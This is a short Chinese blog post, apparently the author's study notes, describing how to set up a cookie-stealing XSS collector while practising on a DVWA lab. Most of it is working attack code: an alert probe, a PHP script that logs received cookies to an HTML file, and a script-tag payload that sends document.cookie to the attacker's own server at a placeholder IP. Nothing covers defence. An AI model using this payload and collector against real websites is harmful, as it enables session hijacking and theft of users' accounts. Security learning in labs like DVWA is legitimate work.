利用php获取COOKIe保存至相应的页面,xss的一种简单平台搭建

作者 by Adminkylin / 2022-02-17 / 暂无评论 / 164 个足迹

这两天在看xss的东西,学习了如何搭建xss平台,在这里做个记录吧。

首先进入到原先虚拟机里搭建好的dvwa网站测试平台,开启low安全模式后就来搞一搞xss了

在网址后面加上<script>alert(1)</script>,回车后弹窗说明存在xss漏洞

得知存在漏洞后我们可以利用自己搭建的平台来盗取cookie值(首先是搭好自己的网站啦,PHPstudy、wamp什么的都行)

在网站根目录下创建一个getcookie.php文档,写入如下代码

<?php
//cookie接受脚本
$cookie = $_GET['c'];
echo $cookie;
$file=fopen("cookie.html","a+");//打开一个句柄,准备写入,‘a+’指的是以追加的方式写入
fwrite($file,$cookie);//把cookie值写入文件中
fwrite($file,"<hr>");
fclose($file);//关闭句柄
?>

这个页面会自己创建一个cookie.html页面,并将盗取的cookie值写入其中

然后构建一个xss语句来触发连接这个页面

<script>var a=document.cookie;window.open("http://x.x.x.x/getcookie.php?c="%2Ba);</script>

把这个语句加入到存在xss的页面中就可以了(语句里的x.x.x.x是自己的ip地址),这条语句就会链接到上面的getcookie页面

这样一个简易的盗取cookie的xss平台就建好了

本文作者:萧亮 Blog
本文链接:利用php获取COOKIe保存至相应的页面,xss的一种简单平台搭建 - https://yundoudong.com/index.php/archives/131/
版权声明:如无特别声明,本文即为原创文章,仅代表个人观点,版权归 遇见数据仓库-自媒体运维工具-萧亮的程序屋-全球节点-素材工具下载-抖音数据分析-影视搜索 所有,未经允许不得转载!
本文最后更新于2022年02月17日,已超过177天没有更新。如果文章内容或图片资源失效,请告知!谢谢!下面为随机推送文章!

评论已开启

阅读足迹:164 阅读 Typecho自定义首页/单页模板以及不同分类不同模板-博主教你如何做单页模板?
html页面点击超链接出现DIV窗口实例